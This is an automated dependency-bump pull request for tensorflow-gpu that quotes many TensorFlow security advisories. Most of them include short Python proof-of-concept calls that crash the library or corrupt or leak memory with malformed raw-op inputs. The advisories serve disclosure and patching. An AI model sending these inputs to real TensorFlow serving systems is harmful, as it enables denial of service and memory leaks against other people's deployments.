[Security] Bump tensorflow-gpu from 1.13.2 to 2.5.0 #638

Open · wants to merge 1 commit into develop
Conversation

dependabot-preview[bot] (Contributor) commented:

Bumps tensorflow-gpu from 1.13.2 to 2.5.0. This update includes security fixes.

Vulnerabilities fixed

Sourced from The GitHub Security Advisory Database.

Low severity vulnerability that affects tensorflow, tensorflow-cpu, and tensorflow-gpu

Impact

A heap buffer overflow in UnsortedSegmentSum can be produced when the Index template argument is int32. In this case the data_size and num_segments fields are truncated from int64 to int32 and can produce negative numbers, resulting in out-of-bounds heap memory accesses.

This is unlikely to be exploitable and was detected and fixed internally. We are issuing this security advisory only to notify users that it is better to update to TensorFlow 1.15 or 2.0 or later, as those versions already contain the fix.
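For orientation only, a normal (non-triggering) call to the op in question is sketched below; per the advisory, the overflow requires data_size/num_segments values large enough to wrap a 32-bit index, which is impractical to reproduce in a short snippet.

import tensorflow as tf

# Orientation only: an ordinary unsorted_segment_sum call. The advisory's
# overflow needs tensors whose element count exceeds the int32 range.
data = tf.constant([1.0, 2.0, 3.0, 4.0])
segment_ids = tf.constant([0, 0, 1, 1])
print(tf.math.unsorted_segment_sum(data, segment_ids, num_segments=2))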

Patches

Patched by db4f9717c41bccc3ce10099ab61996b246099892 and released in all official releases after 1.15 and 2.0.

For more information

Please consult SECURITY.md for more information regarding the security model and how to contact us with issues and questions.

Affected versions: < 1.15

Sourced from The GitHub Security Advisory Database.

High severity vulnerability that affects tensorflow, tensorflow-cpu, and tensorflow-gpu

Impact

Converting a string (from Python) to a tf.float16 value results in a segmentation fault in eager mode, as the format checks for this use case are only present in graph mode.

This issue can lead to denial of service in inference/training, where a malicious attacker can send a data point which contains a string instead of a tf.float16 value.

Similar effects can be obtained by manipulating saved models and checkpoints: replacing a scalar tf.float16 value with a scalar string will trigger this issue due to automatic conversions.

This can be easily reproduced by tf.constant("hello", tf.float16), if eager execution is enabled.
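Spelled out as a standalone snippet (this mirrors the one-liner above; eager execution is the default in TF 2.x):

import tensorflow as tf

# Reproduction from the advisory: on affected versions, casting a Python
# string to tf.float16 in eager mode crashes the process instead of
# raising an error.
tf.constant("hello", tf.float16)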

Patches

We have patched the vulnerability in GitHub commit 5ac1b9.

We are additionally releasing TensorFlow 1.15.1 and 2.0.1 with this vulnerability patched.

TensorFlow 2.1.0 was released after we fixed the issue, thus it is not affected.

We encourage users to switch to TensorFlow 1.15.1, 2.0.1 or 2.1.0.

For more information

... (truncated)

Affected versions: < 1.15.2

Sourced from The GitHub Security Advisory Database.

Segfault in tf.quantization.quantize_and_dequantize

Impact

An attacker can pass an invalid axis value to tf.quantization.quantize_and_dequantize:

tf.quantization.quantize_and_dequantize(
    input=[2.5, 2.5], input_min=[0,0], input_max=[1,1], axis=10)

This results in accessing a dimension outside the rank of the input tensor in the C++ kernel implementation:

const int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);

However, dim_size only does a DCHECK to validate the argument and then uses it to access the corresponding element of an array:

int64 TensorShapeBase::dim_size(int d) const {
  DCHECK_GE(d, 0);
  DCHECK_LT(d, dims());
  DoStuffWith(dims_[d]);
}

... (truncated)

Affected versions: < 2.4.0

Sourced from The GitHub Security Advisory Database.

Float cast overflow undefined behavior

Impact

When the boxes argument of tf.image.crop_and_resize has a very large value, the CPU kernel implementation receives it as a C++ nan floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault.
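A minimal sketch of the scenario described, assuming a single crop box whose coordinates are pushed far outside the normal [0, 1] range (the exact triggering values are not given in the excerpt):

import tensorflow as tf

# Sketch only: per the advisory, extreme box coordinates end up as
# non-finite floats in the CPU kernel and lead to undefined behavior.
image = tf.zeros([1, 4, 4, 1], dtype=tf.float32)
boxes = tf.constant([[1e38, 1e38, 1e38, 1e38]], dtype=tf.float32)
box_indices = tf.constant([0], dtype=tf.int32)
tf.image.crop_and_resize(image, boxes, box_indices, crop_size=[2, 2])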

Patches

We have patched the issue in c0319231333f0f16e1cc75ec83660b01fedd4182 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported in #42129

Affected versions: < 2.4.0

Sourced from The GitHub Security Advisory Database.

Heap out of bounds access in MakeEdge in TensorFlow

Impact

Under certain cases, loading a saved model can result in accessing uninitialized memory while building the computation graph. The MakeEdge function creates an edge between one output tensor of the src node (given by output_index) and the input slot of the dst node (given by input_index). This is only possible if the types of the tensors on both sides coincide, so the function begins by obtaining the corresponding DataType values and comparing these for equality:

  DataType src_out = src->output_type(output_index);
  DataType dst_in = dst->input_type(input_index);
  //...

However, there is no check that the indices point to inside of the arrays they index into. Thus, this can result in accessing data out of bounds of the corresponding heap allocated arrays.

In most scenarios, this can manifest as uninitialized data access, but if the index points far away from the boundaries of the arrays, this can be used to leak addresses from the library.

Patches

We have patched the issue in GitHub commit 0cc38aaa4064fd9e79101994ce9872c6d91f816b and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

Since this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

CHECK-fail in LSTM with zero-length input in TensorFlow

Impact

Running an LSTM/GRU model where the LSTM/GRU layer receives a zero-length input results in a CHECK failure when using the CUDA backend.

This can result in a query-of-death vulnerability, via denial of service, if users can control the input to the layer.
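A minimal sketch of the setup described (a Keras LSTM layer receiving an input with a zero-length time dimension); per the advisory, the CHECK failure only fires on the CUDA backend:

import tensorflow as tf

# Sketch: an LSTM layer fed a batch with zero timesteps. On affected
# versions with the CUDA backend this is described as hitting a CHECK
# failure (process abort).
layer = tf.keras.layers.LSTM(4)
empty_input = tf.zeros([1, 0, 2])  # (batch, timesteps=0, features)
layer(empty_input)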

Patches

We have patched the issue in GitHub commit 14755416e364f17fb1870882fa778c7fec7f16e3 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

Since this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

Write to immutable memory region in TensorFlow

Impact

The tf.raw_ops.ImmutableConst operation returns a constant tensor created from a memory mapped file which is assumed immutable. However, if the type of the tensor is not an integral type, the operation crashes the Python interpreter as it tries to write to the memory area:

>>> import tensorflow as tf
>>> with open('/tmp/test.txt','w') as f: f.write('a'*128)
>>> tf.raw_ops.ImmutableConst(dtype=tf.string,shape=2,
                              memory_region_name='/tmp/test.txt')

If the file is too small, TensorFlow properly returns an error as the memory area has fewer bytes than what is needed for the tensor it creates. However, as soon as there are enough bytes, the above snippet causes a segmentation fault.

This is because the allocator used to return the buffer data is not marked as returning an opaque handle, since the needed virtual method is not overridden.

Patches

We have patched the issue in GitHub commit c1e1fc899ad5f8c725dcbb6470069890b5060bc7 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

Since this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.

For more information

... (truncated)

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

Lack of validation in data format attributes in TensorFlow

Impact

The tf.raw_ops.DataFormatVecPermute API does not validate the src_format and dst_format attributes. The code assumes that these two arguments define a permutation of NHWC.

However, these assumptions are not checked and this can result in uninitialized memory accesses, reads outside of bounds, and even crashes.

>>> import tensorflow as tf
>>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='1234', dst_format='1234')
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='HHHH', dst_format='WWWW')
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='H', dst_format='W')
>>> tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4],
                                    src_format='1234', dst_format='1253')
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4],

... (truncated)

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

Uninitialized memory access in TensorFlow

Impact

Under certain cases, a saved model can trigger use of uninitialized values during code execution. This is caused by having tensor buffers be filled with the default value of the type but forgetting to default initialize the quantized floating point types in Eigen:

struct QUInt8 {
  QUInt8() {}
  // ...
  uint8_t value;
};
struct QInt16 {
  QInt16() {}
  // ...
  int16_t value;
};
struct QUInt16 {
  QUInt16() {}
  // ...
  uint16_t value;

... (truncated)

Affected versions: < 1.15.5

Sourced from The GitHub Security Advisory Database.

Integer truncation in Shard API usage

Impact

The Shard API in TensorFlow expects the last argument to be a function taking two int64 (i.e., long long) arguments: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/util/work_sharder.h#L59-L60

However, there are several places in TensorFlow where a lambda taking int or int32 arguments is being used: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L204-L205 https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L317-L318

In these cases, if the amount of work to be parallelized is large enough, integer truncation occurs. Depending on how the two arguments of the lambda are used, this can result in segfaults, read/write outside of heap allocated arrays, stack overflows, or data corruption.
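As an illustration of the truncation itself (not TensorFlow code), casting a large 64-bit work count down to 32 bits silently wraps:

import ctypes

# Illustration only: a work size that fits in int64 but not in int32.
total_work = 2**31 + 5
truncated = ctypes.c_int32(total_work).value
print(total_work, truncated)  # 2147483653 -2147483643: a negative "amount of work"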

Patches

We have patched the issue in 27b417360cbd671ef55915e4bb6bb06af8b8a832 and ca8c013b5e97b1373b3bb1c97ea655e69f31a575. We will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in Tensorflow

Impact

The implementation of SparseFillEmptyRowsGrad uses a double indexing pattern: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L263-L269

It is possible for reverse_index_map(i) to be an index outside of bounds of grad_values, thus resulting in a heap buffer overflow.

Patches

We have patched the issue in 390611e0d45c5793c7066110af37c8514e6a6c54 and will release a patch release for all affected versions.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Denial of Service in Tensorflow

Impact

The SparseFillEmptyRowsGrad implementation has incomplete validation of the shapes of its arguments: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L235-L241

Although reverse_index_map_t and grad_values_t are accessed in a similar pattern, only reverse_index_map_t is validated to be of proper shape. Hence, malicious users can pass a bad grad_values_t to trigger an assertion failure in vec, causing denial of service in serving installations.

Patches

We have patched the issue in 390611e0d45c5793c7066110af37c8514e6a6c54 and will release a patch release for all affected versions.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability is a variant of GHSA-63xm-rx5p-xvqr

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Segfault in Tensorflow

Impact

The tf.raw_ops.Switch operation takes as input a tensor and a boolean and outputs two tensors. Depending on the boolean value, one of the tensors is exactly the input tensor whereas the other one should be an empty tensor.

However, the eager runtime traverses all tensors in the output: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/common_runtime/eager/kernel_and_device.cc#L308-L313

Since only one of the tensors is defined, the other one is nullptr, hence we are binding a reference to nullptr. This is undefined behavior and is reported as an error when compiling with -fsanitize=null. In this case, it results in a segmentation fault.

Patches

We have patched the issue in da8558533d925694483d2c136a9220d6d49d843c and will release a patch release for all affected versions.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Denial of Service in Tensorflow

Impact

Changing TensorFlow's SavedModel protocol buffer and altering the name of required keys results in segfaults and data corruption while loading the model. This can cause a denial of service in products using tensorflow-serving or other inference-as-a-service installations.

We have added fixes to this in f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d (both going into TensorFlow 2.2.0 and 2.3.0 but not yet backported to earlier versions). However, this was not enough, as #41097 reports a different failure mode.

Patches

We have patched the issue in adf095206f25471e864a8e63a0f1caef53a0e3a6 and will release patch releases for all versions between 1.15 and 2.3. Patch releases for versions between 1.15 and 2.1 will also contain cherry-picks of f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Shuaike Dong, from Alipay Tian Qian Security Lab && Lab for Applied Security Research, CUHK.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Data leak in Tensorflow

Impact

The data_splits argument of tf.raw_ops.StringNGrams lacks validation. This allows a user to pass values that can cause heap overflow errors and even leak the contents of memory:

>>> tf.raw_ops.StringNGrams(data=["aa", "bb", "cc", "dd", "ee", "ff"], data_splits=[0,8], separator=" ", ngram_widths=[3], left_pad="", right_pad="", pad_width=0, preserve_short_sequences=False)
StringNGrams(ngrams=
Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Denial of Service in Tensorflow

Impact

By controlling the fill argument of tf.strings.as_string, a malicious attacker is able to trigger a format string vulnerability due to the way the internal format used in a printf call is constructed: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/as_string_op.cc#L68-L74

This can result in unexpected output:

In [1]: tf.strings.as_string(input=[1234], width=6, fill='-')                                                                     
Out[1]:                                               
In [2]: tf.strings.as_string(input=[1234], width=6, fill='+')                                                                     
Out[2]:  
In [3]: tf.strings.as_string(input=[1234], width=6, fill="h")                                                                     
Out[3]:  
In [4]: tf.strings.as_string(input=[1234], width=6, fill="d")                                                                     
Out[4]:  
In [5]: tf.strings.as_string(input=[1234], width=6, fill="o")
Out[5]: 
In [6]: tf.strings.as_string(input=[1234], width=6, fill="x")
Out[6]: 
In [7]: tf.strings.as_string(input=[1234], width=6, fill="g")
Out[7]: 
In [8]: tf.strings.as_string(input=[1234], width=6, fill="a")

... (truncated)

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Segfault and data corruption in tensorflow-lite

Impact

To mimic Python's indexing with negative values, TFLite uses ResolveAxis to convert negative values to positive indices. However, the check that the converted index is valid is only present in debug builds: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reduce.h#L68-L72

If the DCHECK does not trigger, then code execution moves ahead with a negative index. This, in turn, results in accessing data out of bounds, which leads to segfaults and/or data corruption. A sketch of the failure mode is given after this paragraph.
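To make that concrete, here is a hypothetical Python-style sketch of the axis-resolution logic the advisory describes (resolve_axis is illustrative, not TFLite source); the bounds check shown is the one that effectively disappears in release builds:

# Hypothetical sketch, not TFLite code: resolve a negative axis the way
# Python indexing does, then bounds-check it. In release TFLite builds the
# equivalent check is a DCHECK, i.e. a no-op, so an axis that is still out
# of range after conversion flows into the kernel and indexes out of bounds.
def resolve_axis(axis, rank):
    resolved = axis + rank if axis < 0 else axis
    if not (0 <= resolved < rank):
        raise ValueError(f"axis {axis} is out of range for rank {rank}")
    return resolved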

Patches

We have patched the issue in 2d88f470dea2671b430884260f3626b1fe99830a and will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Segfault in Tensorflow

Impact

In eager mode, TensorFlow does not set the session state. Hence, calling tf.raw_ops.GetSessionHandle or tf.raw_ops.GetSessionHandleV2 results in a null pointer dereference: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/session_ops.cc#L45

In the above snippet, in eager mode, ctx->session_state() returns nullptr. Since the code immediately dereferences this, we get a segmentation fault.
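A minimal sketch of the call described (eager mode is the default in TF 2.x, so no extra setup is needed):

import tensorflow as tf

# Sketch: session-handle ops have no session state in eager mode, which the
# advisory describes as leading to a null pointer dereference on affected
# versions.
tf.raw_ops.GetSessionHandle(value=tf.constant(1.0))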

Patches

We have patched the issue in 9a133d73ae4b4664d22bd1aa6d654fec13c52ee1 and will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Null pointer dereference in tensorflow-lite

Impact

A crafted TFLite model can force a node to have as input a tensor backed by a nullptr buffer. This can be achieved by changing a buffer index in the flatbuffer serialization to convert a read-only tensor to a read-write one. The runtime assumes that these buffers are written to before a possible read, hence they are initialized with nullptr: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/core/subgraph.cc#L1224-L1227

However, by changing the buffer index for a tensor, that tensor is implicitly converted to a read-write one; since nothing in the model writes to it, we get a null pointer dereference.

Patches

We have patched the issue in 0b5662bc and will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360 but was also discovered through variant analysis of GHSA-cvpc-8phh-8f45.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Data corruption in tensorflow-lite

Impact

When determining the common dimension size of two tensors, TFLite uses a DCHECK, which is a no-op outside of debug compilation modes: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/types.h#L437-L442

Since the function always returns the dimension of the first tensor, malicious attackers can craft cases where this is larger than that of the second tensor. In turn, this would result in reads/writes outside of bounds since the interpreter will wrongly assume that there is enough data in both tensors.

Patches

We have patched the issue in 8ee24e7949a20 and will release patch releases for all versions between 1.15 and 2.3.

We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Affected versions: < 1.15.4

Sourced from The GitHub Security Advisory Database.

Null pointer dereference via invalid Ragged Tensors

Impact

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

import tensorflow as tf
input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 2, 6, 2], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 39, 34, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Reference binding to null pointer in MatrixDiag* ops

Impact

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty:

      num_rows = context->input(2).flat()(0);
      num_cols = context->input(3).flat()(0);
      padding_value = context->input(4).flat()(0);

Thus, users can trigger null pointer dereferences if any of the above tensors are null:

import tensorflow as tf
d = tf.convert_to_tensor([],dtype=tf.float32)
p = tf.convert_to_tensor([],dtype=tf.float32)
tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p)

Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Type confusion during tensor casts lead to dereferencing null pointers

Impact

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors results in null pointer dereferences.

There are multiple ways to reproduce this, listing a few examples here:

import tensorflow as tf
import numpy as np
data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64)

import tensorflow as tf
import numpy as np
data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20)

import tensorflow as tf

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in SparseCross due to type confusion

Impact

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service:

import tensorflow as tf
hashed_output = False
num_buckets = 1949315406
hash_key = 1869835877
out_type = tf.string
internal_type = tf.string
indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64)
indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.constant([0], dtype=tf.int64)
values_2 = tf.constant([72], dtype=tf.int64)
values = [values_1, values_2]

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Session operations in eager mode lead to null pointer dereferences

Impact

In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference:

import tensorflow as tf
tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4)
import tensorflow as tf
tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])

The implementation dereferences the session state pointer without checking if it is valid:

  OP_REQUIRES_OK(ctx, ctx->session_state()->GetTensor(name, &val));

Thus, in eager mode, ctx->session_state() is nullptr and the call of the member function is undefined behavior.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by zero in Conv3D

Impact

A malicious user could trigger a division by 0 in the Conv3D implementation:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

The implementation does a modulo operation based on user controlled input:

  const int64 out_depth = filter.dim_size(4);
  OP_REQUIRES(context, in_depth % filter_depth == 0, ...);

Thus, when filter has a 0 as the fifth element, this results in a division by 0.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow caused by rounding

Impact

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in an off-by-one error when accessing image elements:

import tensorflow as tf
l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384]
images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32)
size = tf.constant([12, 6], shape=[2], dtype=tf.int32)
min = tf.constant(80.22522735595703)
max = tf.constant(80.39215850830078)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max,
align_corners=True, half_pixel_centers=True)

This is because the implementation computes two integers (representing the upper and lower bounds for interpolation) by ceiling and flooring a floating point value:

const float in_f = std::floor(in);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in Conv3DBackprop*

Impact

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows:

import tensorflow as tf
input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32)
out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 89, 29, 89, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

import tensorflow as tf
input_values = [-10.0] * (7 * 7 * 7 * 7 * 7)
input_values[0] = 429.6491056791816
input_sizes = tf.constant(input_values, shape=[7, 7, 7, 7, 7], dtype=tf.float32)

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedConv2D

Impact

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D:

import tensorflow as tf
input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8)
filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8)
min_input = tf.constant(0.0)
max_input = tf.constant(0.0001)
min_filter = tf.constant(0.0)
max_filter = tf.constant(0.0001)
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.QuantizedConv2D(input=input, filter=filter, min_input=min_input, max_input=max_input, min_filter=min_filter, max_filter=max_filter, strides=strides, padding=padding)

This is because the implementation does a division by a quantity that is controlled by the caller:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in Conv2D

Impact

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D:

import tensorflow as tf
input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

This is because the implementation does a division by a quantity that is controlled by the caller:

  const int64 patch_depth = filter.dim_size(2);
  if (in_depth % patch_depth != 0) { ... }

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in Conv2DBackpropInput

Impact

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput:

import tensorflow as tf
input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor,
out_backprop=out_backprop, strides=[1, 1, 1, 1],
use_cudnn_on_gpu=True, padding='SAME',
explicit_paddings=[], data_format='NHWC',
dilations=[1, 1, 1, 1])

This is because the implementation does a division by a quantity that is controlled by the caller:


... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in Conv2DBackpropFilter

Impact

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 18, 1], use_cudnn_on_gpu=True,
padding='SAME', explicit_paddings=[],
data_format='NHWC', dilations=[1, 1, 1, 1])

This is because the implementation does a modulus operation where the divisor is controlled by the caller:


... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in AddManySparseToTensorsMap

Impact

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap:

import tensorflow as tf
import numpy as np
sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64)
sparse_values = tf.ones([1], dtype=tf.int64)
shape = tf.Variable(tf.ones([55], dtype=tf.int64))
shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64))
tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices,
sparse_values=sparse_values,
sparse_shape=shape)

This is because the implementation takes the values specified in sparse_shape as dimensions for the output shape:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in Conv3DBackprop*

Impact

